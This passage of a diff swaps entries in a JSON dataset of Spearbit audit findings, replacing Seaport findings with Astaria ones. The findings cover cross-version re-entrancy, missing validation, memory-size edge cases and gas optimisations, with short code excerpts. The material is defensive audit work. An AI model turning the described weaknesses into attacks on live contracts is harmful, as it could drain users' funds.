And an off-chain agent may send misleading notifications to either party that their order succeeded due to this quirk with contract order hashes.", + "title": "Updated ...EpochLength values are not validated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "A sanity check is missing for the updated s.minEpochLength and s.maxEpochLength. We need to make sure s.minEpochLength <= s.maxEpochLength", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "When _contractNonces[offerer] gets updated no event is emitted", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When _contractNonces[offerer] gets updated no event is emitted. This is in contrast to when a counter is updated. One might be able to extract the _contractNonces[offerer] (if it doesn't overflow 12 bytes to enter into the offerer region in the orderHash) from a later event when OrderFulfilled gets emitted. OrderFulfilled only gets emitted for an order of CONTRACT type if the generateOrder(...)'s return data satisfies all the constraints.", + "title": "CollateralToken's conduit would have an open channel to an old Seaport when Seaport is updated", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "After filing for a new Seaport, the old Seaport would still have an open channel to it from the CollateralToken's conduit (assuming the old and new Seaport share the same conduit controller).", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "In general a contract offerer or a zone cannot draw a conclusion accurately based on the spent offer amounts or received consideration amounts shared with them post-transfer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When one calls one of the Seaport endpoints that fulfills or matches a collection of (advanced) orders, the used offer or consideration items will go through different modification steps in memory. In particular, the startAmount a of these items is an important parameter to inspect: a → a′ → b → a′. a: the original startAmount parameter shared with Seaport by the caller, as encoded in memory. a′: the interpolated value; for orders of CONTRACT order type it is the value returned by the contract offerer (interpolation does not have an effect in this case since the startAmount and endAmount are enforced to be equal). b: must be 0 for used consideration items, otherwise the call would revert; for offer items, it can be in [0, a′) (see The spent offer item amounts shared with a zone for restricted (advanced) orders or with a contract offerer for orders of CONTRACT order type is not the actual spent amount in general). a′: the final amount shared by Seaport with either a zone for restricted orders or a contract offerer for CONTRACT order types. Offer Items For offer items, perhaps the zone or the contract offerer would like to check that the offerer has spent a maximum of a′ of that specific offer item. For the case of restricted orders where the zone's validateOrder(...) will be called, the offerer might end up spending more than a′ of a specific token with the same identifier if the collection of orders includes: A mix of open and restricted orders.
Multiple zones for the same offerer, offering the same token with the same identifier. Multiple orders using the same zone. In this case, the zone might not have a sense of the order of the transfers or which orders are included in the transaction in question (unless the contexts used by the zone enforce the exact ordering and number of items that can be matched/fulfilled in the same transaction). Note the order of transfers can be manipulated/engineered by constructing specific fulfillment data. Given a fulfillment data to combine/aggregate orders, there could be permutations of it that create different orderings of the executions. An order with an actor (a consideration recipient, contract offerer, weird token, ...) that has approval to transfer this specific offer item for the offerer in question. And when Seaport calls into this actor (NATIVE, ERC1155 token transfers, ...), the actor would transfer the token to a different address than the offerer. There also is a special case where an order with the same offer item token and identifier is signed on a different instance of Seaport (1.0, 1.1, 1.2, ..., or other non-official versions) which an actor (a consideration recipient, contract offerer, weird token, ...) can cross-call into (related: Cross-Seaport re-entrancy with the stateful validateOrder call). The above issue can be avoided if the offerer makes sure to not sign different transactions across different or the same instances of Seaport which 1. share the same offer type, offer token, and offer identifier, 2. but differ in a mix of zone and order type, 3. can be active at a shared timestamp. And/or the offerer does not give untrusted parties their token approvals. A similar issue can arise for a contract offerer if they use a mix of signed orders of non-CONTRACT order type and CONTRACT order types. Consideration Items For consideration items, perhaps the zone or the contract offerer would like to check that the recipient of each consideration item has received a minimum of a′ of that specific consideration item. This case also is similar to the offer items issues above when a mix of orders has been used.", + "title": "CollateralToken's tokenURI uses the underlying asset's tokenURI", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Since the CollateralToken positions can be sold on secondary markets like OpenSea, the tokenURI endpoint should be customised to avoid misleading users, and it should contain information relating to the CollateralToken and not just its underlying asset. It would also be great to pull information from its associated lien to include here. What-is-OpenSea-s-copymint-policy. docs.opensea.io/docs/metadata-standards. Necromint got banned on OpenSea.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "Cross-Seaport re-entrancy with the stateful validateOrder call", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The re-entrancy check in Seaport 1.2 will prevent the Zone from interacting with Seaport 1.2 again. However, an interesting scenario would happen if the conduit has open channels to both Seaport 1.1 and Seaport 1.2 (or different deployments/forks of Seaport 1.2). This can lead to cross-Seaport re-entrancy. This is not immediately problematic as Zones have limited functionality currently.
But since Zones can be as flexible as possible, Zones need to be careful if they can interact with multiple versions of Seaport. Note: for Seaport 1.1's zone, the check _assertRestrictedBasicOrderValidity happens before the transfers, and it's also a staticcall. In the future, Seaport 1.3 could also have the same zone interaction, i.e., stateful calls to zones allowing for complex cross-Seaport re-entrancy between 1.2 and 1.3. Note: also see \"getOrderStatus and getContractOffererNonce are prone to view reentrancy\" for concerns around view-only re-entrancy.", + "title": "Filing to update one of the main contracts from another main contract lacks validation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The main contracts AstariaRouter, CollateralToken, and LienToken all need to be aware of each other and form a connected triangle. They are all part of a single unit and perhaps are separated into 3 different contracts due to code size and needing to have two individual ERC721 tokens. Their authorised filing structure is as follows (diagram of the filing triangle omitted): Note that one cannot file for CollateralToken to change LienToken as the value of LienToken is only set during the CollateralToken's initialisation. If one files to change one of these nodes and forgets to check or update the links between these contracts, the triangle above would be broken.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "getOrderStatus and getContractOffererNonce are prone to view reentrancy", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "_contractNonces[offerer] gets updated mid-flight: if a mix of contract offerer orders and partial orders is used, Seaport would call into the offerer contracts (let's call one of these offerer contracts X). In turn X can be a contract that would call into other contracts (let's call them Y) that take into consideration _orderStatus[orderHash] or _contractNonces[offerer] in their codebase by calling getOrderStatus or getContractOffererNonce. The values for _orderStatus[orderHash] or _contractNonces[offerer] might get updated after Y seeks those from Seaport due to, for example, multiple partial orders with the same orderHash or multiple offerer contract orders using the same offerer. Therefore Y would only take into consideration the mid-flight values and not the final ones after the whole transaction with Seaport is completed.", + "title": "TRANSFER_PROXY is not queried in a consistent fashion.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Different usages of TRANSFER_PROXY and how it is queried: AstariaRouter: Used in pullToken(...) to move tokens from the msg.sender to another address. CollateralToken: Used in validateOrder(...), which Seaport has called back into. Here CollateralToken gives approval to TRANSFER_PROXY, which is queried from AstariaRouter, for the settlement tokens. TRANSFER_PROXY is also used to transfer tokens. LienToken: In _payment(...) TRANSFER_PROXY is used to transfer tokens from CollateralToken to the lien owner. This implies that the TRANSFER_PROXY used in CollateralToken should be the same that is used in LienToken. Therefore, from the above we see that: 1. TRANSFER_PROXY holds token approvals for ERC20 or wETH tokens used as lien tokens. 2.
TRANSFER_PROXY's address should be the same at all call sites for the different contracts AstariaRouter, CollateralToken and LienToken. 3. Except for CollateralToken, which queries TRANSFER_PROXY from AstariaRouter, the other two contracts AstariaRouter and LienToken read this value from their storage. Note that the deployment script assigns the same TRANSFER_PROXY to all the 3 main contracts in the codebase AstariaRouter, CollateralToken, and LienToken.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "The size calculation can be incorrect for large numbers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The maximum value of a memory offset is defined in PointerLibraries.sol#L22 as OffsetOrLengthMask = 0xffffffff, i.e., 2^32 − 1. However, the mask OnlyFullWordMask = 0xffffe0; is defined to be a 24-bit number. Assume that the length of the bytes type where src points is 0xffffe0, then the following piece of code incorrectly computes the size as 0. function abi_encode_bytes( MemoryPointer src, MemoryPointer dst ) internal view returns (uint256 size) { unchecked { size = ((src.readUint256() & OffsetOrLengthMask) + AlmostTwoWords) & OnlyFullWordMask; ... This is because the constant OnlyFullWordMask does not have the two higher order bytes set (as a 32-bit type). Note: in practice, it can be difficult to construct bytes of length 0xffffe0 due to the upper bound defined by the block gas limit. However, this length is still below Seaport's OffsetOrLengthMask, and therefore may be able to evade many checks.", + "title": "Multicall when inherited by ERC4626RouterBase does not bubble up the reverts correctly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Multicall does not bubble up the reverts correctly. The current implementation uses the following snippet to bubble up the reverts: // https://github.com/AstariaXYZ/astaria-gpl/blob/.../src/Multicall.sol pragma solidity >=0.7.6; if (!success) { // Next 5 lines from https://ethereum.stackexchange.com/a/83577 if (result.length < 68) revert(); assembly { result := add(result, 0x04) } revert(abi.decode(result, (string))); } // https://github.com/AstariaXYZ/astaria-gpl/blob/.../src/ERC4626RouterBase.sol pragma solidity ^0.8.17; ... abstract contract ERC4626RouterBase is IERC4626RouterBase, Multicall { ... } This method of bubbling up does not work with the newer types of errors: Panic(uint256), introduced in Solidity 0.8.0 (2020-12-16); custom errors, introduced in 0.8.4 (2021-04-21); ...", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Low Risk" ] }, { - "title": "_prepareBasicFulfillmentFromCalldata expands memory by 4 extra words more than is needed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In _prepareBasicFulfillmentFromCalldata, we have: // Update the free memory pointer so that event data is persisted. mstore(0x40, add(0x80, add(eventDataPtr, dataSize))) OrderFulfilled's event data is stored in memory in the region [eventDataPtr, eventDataPtr + dataSize). It's important to note that eventDataPtr is an absolute memory pointer and not a relative one. So the above 4 words, 0x80, in the snippet are extra.
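In other words, a sketch of the implied correction (since eventDataPtr is already absolute, as noted above) would be:

// Update the free memory pointer so that event data is persisted.
mstore(0x40, add(eventDataPtr, dataSize))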
For example, in the \"ERC721 <=> ETH (basic, minimal and verified on-chain)\" test case in test/basic.spec.ts, the Seaport memory profile at the end of the call of marketplaceContract.connect(buyer).fulfillBasicOrder(basicOrderParameters, {value,}) looks like:
0x000 23b872dd000000000000000000000000f372379f3c48ad9994b46f36f879234a ; transferFrom.selector(from, to, id)
0x020 27b4556100000000000000000000000016c53175c34f67c1d4dd0878435964c1 ; ...
0x040 0000000000000000000000000000000000000000000000000000000000000440 ; free memory pointer
0x060 0000000000000000000000000000000000000000000000000000000000000000 ; ZERO slot
0x080 fa445660b7e21515a59617fcd68910b487aa5808b8abda3d78bc85df364b2c2f ; orderTypeHash
0x0a0 000000000000000000000000f372379f3c48ad9994b46f36f879234a27b45561 ; offerer
0x0c0 0000000000000000000000000000000000000000000000000000000000000000 ; zone
0x0e0 78d24b64b38e96956003ddebb880ec8c1d01f333f5a4bfba07d65d5c550a3755 ; h(ho)
0x100 81c946a4f4982cb7ed0c258f32da6098760f98eaf6895d9ebbd8f9beccb293e7 ; h(hc, ha[0], ..., ha[n])
0x120 0000000000000000000000000000000000000000000000000000000000000000 ; orderType
0x140 0000000000000000000000000000000000000000000000000000000000000000 ; startTime
0x160 000000000000000000000000000000000000ff00000000000000000000000000 ; endTime
0x180 8f1d378d2acd9d4f5883b3b9e85385cf909e7ab825b84f5a6eba28c31ea5246a ; zoneHash > orderHash
0x1a0 00000000000000000000000016c53175c34f67c1d4dd0878435964c1c9b70db7 ; salt > fulfiller
0x1c0 0000000000000000000000000000000000000000000000000000000000000080 ; offererConduitKey > offerer array head
0x1e0 0000000000000000000000000000000000000000000000000000000000000120 ; counter[offerer] > consideration array head
0x200 0000000000000000000000000000000000000000000000000000000000000001 ; h[4]? > offer.length
0x220 0000000000000000000000000000000000000000000000000000000000000002 ; h[...]? > offer.itemType
0x240 000000000000000000000000c67947dc8d7fd0c2f25264f9b9313689a4ac39aa ; > offer.token
0x260 00000000000000000000000000000000c02c1411443be3c204092b54976260b9 ; > offer.identifierOrCriteria
0x280 0000000000000000000000000000000000000000000000000000000000000001 ; > offer's current interpolated amount
0x2a0 0000000000000000000000000000000000000000000000000000000000000001 ; > totalConsiderationRecipients + 1
0x2c0 0000000000000000000000000000000000000000000000000000000000000000 ; > receivedItemType
0x2e0 0000000000000000000000000000000000000000000000000000000000000000 ; > consideration.token (NATIVE)
0x300 0000000000000000000000000000000000000000000000000000000000000000 ; > consideration.identifierOrCriteria
0x320 0000000000000000000000000000000000000000000000000000000000000001 ; > consideration's current interpolated amount
0x340 000000000000000000000000f372379f3c48ad9994b46f36f879234a27b45561 ; > offerer
0x360 0000000000000000000000000000000000000000000000000000000000000000 ; unused
0x380 0000000000000000000000000000000000000000000000000000000000000000 ; unused
0x3a0 0000000000000000000000000000000000000000000000000000000000000000 ; unused
0x3c0 0000000000000000000000000000000000000000000000000000000000000000 ; unused
0x3e0 0000000000000000000000000000000000000000000000000000000000000040 ; sig.length
0x400 26aa4a333d4b615af662e63ce7006883f678068b8dc36f53f70aa79c28f2032c ; sig[ 0:31]
0x420 f640366430611c54bafd13314285f7139c85d69f423794f47ee088fc6bfbf43f ; sig[32:63]
0x440 0000000000000000000000000000000000000000000000000000000000000001 ; fulfilled = 1; // returns
(bool fulfilled). Notice the 4 unused memory slots. Transaction Trace: this is also a good example showing that certain memory slots that previously held values like zoneHash, salt, ... have been overwritten due to the small number of consideration items (this actually happens inside _prepareBasicFulfillmentFromCalldata).", + "title": "Cache VAULT().ROUTER().LIEN_TOKEN()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Repeated evaluation of VAULT().ROUTER().LIEN_TOKEN() leads to extra external calls.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "TypehashDirectory's constructor code can be optimized.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "TypehashDirectory's deployed bytecode in its current form is:
00
3ca2711d29384747a8f61d60aad3c450405f7aaff5613541dee28df2d6986d32 ; h_00
bf8e29b89f29ed9b529c154a63038ffca562f8d7cd1e2545dda53a1b582dde30 ; h_01
53c6f6856e13104584dd0797ca2b2779202dc2597c6066a42e0d8fe990b0024d ; h_02
a02eb7ff164c884e5e2c336dc85f81c6a93329d8e9adf214b32729b894de2af1 ; h_03
39c9d33c18e050dda0aeb9a8086fb16fc12d5d64536780e1da7405a800b0b9f6 ; h_04
1c19f71958cdd8f081b4c31f7caf5c010b29d12950be2fa1c95070dc47e30b55 ; h_05
ca74fab2fece9a1d58234a274220ad05ca096a92ef6a1ca1750b9d90c948955c ; h_06
7ff98d9d4e55d876c5cfac10b43c04039522f3ddfb0ea9bfe70c68cfb5c7cc14 ; h_07
bed7be92d41c56f9e59ac7a6272185299b815ddfabc3f25deb51fe55fe2f9e8a ; h_08
d1d97d1ef5eaa37a4ee5fbf234e6f6d64eb511eb562221cd7edfbdde0848da05 ; h_09
896c3f349c4da741c19b37fec49ed2e44d738e775a21d9c9860a69d67a3dae53 ; h_10
bb98d87cc12922b83759626c5f07d72266da9702d19ffad6a514c73a89002f5f ; h_11
e6ae19322608dd1f8a8d56aab48ed9c28be489b689f4b6c91268563efc85f20e ; h_12
6b5b04cbae4fcb1a9d78e7b2dfc51a36933d023cf6e347e03d517b472a852590 ; h_13
d1eb68309202b7106b891e109739dbbd334a1817fe5d6202c939e75cf5e35ca9 ; h_14
1da3eed3ecef6ebaa6e5023c057ec2c75150693fd0dac5c90f4a142f9879fde8 ; h_15
eee9a1392aa395c7002308119a58f2582777a75e54e0c1d5d5437bd2e8bf6222 ; h_16
c3939feff011e53ab8c35ca3370aad54c5df1fc2938cd62543174fa6e7d85877 ; h_17
0efca7572ac20f5ae84db0e2940674f7eca0a4726fa1060ffc2d18cef54b203d ; h_18
5a4f867d3d458dabecad65f6201ceeaba0096df2d0c491cc32e6ea4e64350017 ; h_19
80987079d291feebf21c2230e69add0f283cee0b8be492ca8050b4185a2ff719 ; h_20
3bd8cff538aba49a9c374c806d277181e9651624b3e31111bc0624574f8bca1d ; h_21
5d6a3f098a0bc373f808c619b1bb4028208721b3c4f8d6bc8a874d659814eb76 ; h_22
1d51df90cba8de7637ca3e8fe1e3511d1dc2f23487d05dbdecb781860c21ac1c ; h_23
for height 24", + "title": "s.currentEpoch can be cached in processEpoch()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "s.currentEpoch is being read from storage multiple times in processEpoch().", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "ConsiderationItem.recipient's absolute memory offset can be cached and reused", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "ConsiderationItem.recipient's absolute offset is calculated twice in the above context.", + "title": "Use basis points for ratios", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Fee ratios are represented through two state variables for numerator and denominator.
A basis point system can be used in its place as it is simpler (denominator always set to 10_000) and gas efficient, as the denominator is now a constant.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "currentAmount can potentially be reused when storing this value in memory in _validateOrdersAndPrepareToFulfill", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "We have considerationItem.startAmount = currentAmount; // 1 ... mload( // 2 add( considerationItem, ReceivedItem_amount_offset ) ) From 1, where considerationItem.startAmount is assigned, until 2 its value is not modified.", + "title": "liquidatorNFTClaim()'s arguments can be made calldata", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The following arguments can be converted to calldata to save gas on copying them to memory: function liquidatorNFTClaim( ILienToken.Stack memory stack, OrderParameters memory params, uint256 counterAtLiquidation ) external whenNotPaused {", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "Information packed in BasicOrderType and how receivedItemType and offeredItemType are derived", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Currently the way information is packed and unpacked in/from BasicOrderType is inefficient. BasicOrderType is only used for BasicOrderParameters and when unpacking, to give an idea of how different parameters are packed into this field.", + "title": "a.mulDivDown(b,1) is equivalent to a*b", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The highlighted code below shows the pattern a.mulDivDown(b, 1), which is equivalent to a*b except for the revert parameters in case of an overflow: return uint256(s.slope).mulDivDown(delta_t, 1) + uint256(s.yIntercept);", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "invalidNativeOfferItemErrorBuffer calculation can be simplified", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "We have:
func sig
------------------------------------------------------------------------------
0b10101000000101110100010 00 0000100   matchOrders
0b01010101100101000100101 00 1000010   matchAdvancedOrders
0b11101101100110001010010 10 1110100   fulfillAvailableOrders
0b10000111001000000001101 10 1000001   fulfillAvailableAdvancedOrders
                          ^ 9th bit", + "title": "try/catch can be removed for simplicity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The following code catches a revert in the external call WETH.deposit{value: owing}() and then reverts itself in the catch clause: try WETH.deposit{value: owing}() { WETH.approve(transferProxy, owing); // make payment lienToken.makePayment(stack); // check balance if (address(this).balance > 0) { // withdraw payable(msg.sender).transfer(address(this).balance); } } catch { revert(); } This effect can also be achieved without using try/catch, which simplifies the code too.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "When accessing or writing to memory the value of an enum for a struct field, the enum's
validation is performed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When accessing or writing to memory the value of an enum type for a struct field, the enum's validation is performed: enum Foo { f1, f2, ... fn } struct boo { Foo foo; ... } boo memory b; P(b.foo); // <--- validation will be performed to check whether the value of `b.foo` is out of range This would apply to OrderComponents.orderType, OrderParameters.orderType, CriteriaResolver.side, ReceivedItem.itemType, OfferItem.itemType, BasicOrderParameters.basicOrderType, ConsiderationItem.itemType, SpentItem.itemType.", + "title": "Cache s.idToUnderlying[collateralId].auctionHash", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "In liquidatorNFTClaim(...), s.idToUnderlying[collateralId].auctionHash is read twice from storage.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "The zero memory slot can be used when supplying no criteria to fulfillOrder, fulfillAvailableOrders, and matchOrders", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When the external functions in this context are called, no criteria is passed to _validateAndFulfillAdvancedOrder, _fulfillAvailableAdvancedOrders, or _matchAdvancedOrders: new CriteriaResolver[](0), // No criteria resolvers supplied. When this gets compiled into YUL, the compiler updates the free memory slot by a word and performs an out-of-range and overflow check for this value: function allocate_memory_() -> memPtr { memPtr := mload(64) let newFreePtr := add(memPtr, 32) if or(gt(newFreePtr, 0xffffffffffffffff), lt(newFreePtr, memPtr)) { panic_error_0x41() } mstore(64, newFreePtr) }", + "title": "Cache keccak256(abi.encode(stack))", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "In LienToken._handleLiquidation(...) lienId is calculated as uint256 lienId = uint256(keccak256(abi.encode(stack))); Note that _handleLiquidation(...) is called by handleLiquidation(...), which has a modifier validateCollateralState(...): validateCollateralState( stack.lien.collateralId, keccak256(abi.encode(stack)) ) And thus keccak256(abi.encode(stack)) is performed twice. The same multiple hashing calculation also happens in the makePayment(...) flow. We recommend caching the keccak256(abi.encode(stack)) value for the above.", "labels": [ "Spearbit", - "Seaport", + "Astaria", "Severity: Gas Optimization" ] }, { - "title": "matchOrders, matchAdvancedOrders, fulfillAvailableAdvancedOrders, fulfillAvailableOrders return executions which are cleaned and validated by the compiler", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Currently, the return values of matchOrders, matchAdvancedOrders, fulfillAvailableAdvancedOrders, fulfillAvailableOrders are cleaned and validated by the compiler.", + "title": "Functions can be made view or pure", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Several functions can be view or pure. The compiler also warns about these functions. For instance, _validateRequest() can be made view.
getSeaportMetadata() can be made pure instead of view.", "labels": [ "Spearbit", - "Seaport", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "abi.encodePacked is used when only bytes/string concatenation is needed.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In the context above, one is using abi.encodePacked like the following: bytes memory B = abi.encodePacked( \"\", \"\", ... \"\" ); For each substring, this causes the compiler to use an mstore (if the substring occupies more than 32 bytes, it will use the smallest number of mstores, which is the ceiling of the length of the substring divided by 32), even though multiple substrings can be combined to fill in one memory slot and thus only use 1 mstore for those.", + "title": "Fix compiler generated warnings for unused arguments", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Several functions have arguments which are not used, and the compiler generates a warning for each instance, cluttering the output. This makes it easy to miss useful warnings. Here is one example of a function with unused arguments: function deposit( uint256 assets, address receiver ) public virtual override(ERC4626Cloned, IERC4626) onlyVault returns (uint256 shares) { revert NotSupported(); }", "labels": [ "Spearbit", - "Seaport", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "solc ABI encoder is used when OrderFulfilled is emitted in _emitOrderFulfilledEvent", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "solc's ABI encoder is used when OrderFulfilled is emitted in _emitOrderFulfilledEvent. That means all the parameters are cleaned and validated before they are provided to log3.", + "title": "Non-lien NFT tokens can get locked in the vaults", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Both public and private vaults, when their onERC721Received(...) is called, return the IERC721Receiver.onERC721Received.selector and perform extra logic if the msg.sender is the LienToken and the operator is the AstariaRouter. This means other NFT tokens (other than lien tokens) received by a vault will be locked.", "labels": [ "Spearbit", - "Seaport", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "The use of identity precompile to copy memory need not be optimal across chains", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The PointerLibraries contract uses a staticcall to the identity precompile, i.e., address 4, to copy memory--poor man's memcpy. This is used as a cheaper alternative to copying 32-byte chunks of memory using mstore(...) in a for-loop. However, the gas efficiency of the identity precompile relies on the version of the EVM on the underlying chain. The base call cost for precompiles before the Berlin hardfork was 700 (from Tangerine Whistle), and after Berlin, this was reduced to 100 (for warm accounts and precompiles). Many EVM compatible L1s, and even L2s, are on old EVM versions.
And using the identity precompile would be more expensive than doing mstores(...).", + "title": "Validation checks should be performed at the beginning of processEpoch()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The following validation check for the data corresponding to the current epoch happens in the middle of processEpoch(), where some accounting has already been done: if (s.epochData[s.currentEpoch].liensOpenForEpoch > 0) { revert InvalidVaultState( InvalidVaultStates.LIENS_OPEN_FOR_EPOCH_NOT_ZERO ); }", "labels": [ "Spearbit", - "Seaport", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Use the zero memory slot for allocating empty data", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In cases where empty data needs to be allocated, one can use the zero slot. This can also be used as initial values for offer and consideration in abi_decode_generateOrder_returndata.", + "title": "Define an onlyOwner modifier for VaultImplementation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "The following require statement has been used multiple times: require(msg.sender == owner());", "labels": [ "Spearbit", - "Seaport", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "Some address fields are masked even though the ConsiderationDecoder wanted to skip this masking", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When a field of address type from a struct in memory is used, the compiler masks (also: 2, 3) it. struct A { address addr; } A memory a; // P is either a statement or a function call // when compiled --> and(mload(a_addr_pos), 0xffffffffffffffffffffffffffffffffffffffff) P(a.addr); Also the compiler is making use of function cleanup_address(value) -> cleaned { cleaned := and(value, 0xffffffffffffffffffffffffffffffffffffffff) } function abi_encode_address(value, pos) { mstore(pos, and(value, 0xffffffffffffffffffffffffffffffffffffffff)) } in a few places", + "title": "Vault is missing an interface", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Vault is missing an interface", "labels": [ "Spearbit", - "Seaport", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "div(x, (1< ... ε = (na + ns > ds)(na + ns − ds) is chosen so that the order would not be overfilled. The parameters used in calculating ε are taken before they have been updated. Case 4. ds ≠ 0, da ≠ 1, da ≠ ds: (na, ns, da, ds) = (na − ε, na + ns − ε, ds, ds). Below, ε = (na·ds + ns·da > da·ds)(na·ds + ns·da − da·ds) is chosen so that the order would not be overfilled. And in case the new values go beyond 120 bits, G = gcd(na·ds − ε, na·ds + ns·da − ε, da·ds), otherwise G will be 1. The parameters used in calculating ε and G are taken before they have been updated.
(na, ns, da, ds) = (1/G)(na·ds − ε, na·ds + ns·da − ε, da·ds, da·ds). If one of the updated values occupies more than 120 bits, the call will be reverted.", + "title": "Elements' orders are not consistent in solidity files", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Elements' orders are not consistent in solidity files", "labels": [ "Spearbit", - "Seaport", - "Severity: Gas Optimization" + "Astaria", + "Severity: Informational" ] }, { - "title": "The magic return value checks can be made stricter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "The magic return value check for ZoneInteraction can be made stricter. 1. It does not check the lower 28 bytes of the return value. 2. It does not check if extcodesize() of the zone is non-zero. In particular, for the identity precompile, the magic check would pass. This is, however, a general issue with the pattern where magic values are the same as the function selector and not specific to the Zone.", + "title": "FileType definitions are not consistent", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review-July.pdf", + "body": "Both ICollateralToken.FileType and ILienToken.FileType start their enums with NotSupported. The definition of FileType in IAstariaRouter is not consistent with that pattern. This might be due to having 0 as NotSupported so that the file endpoints would revert.", "labels": [ "Spearbit", - 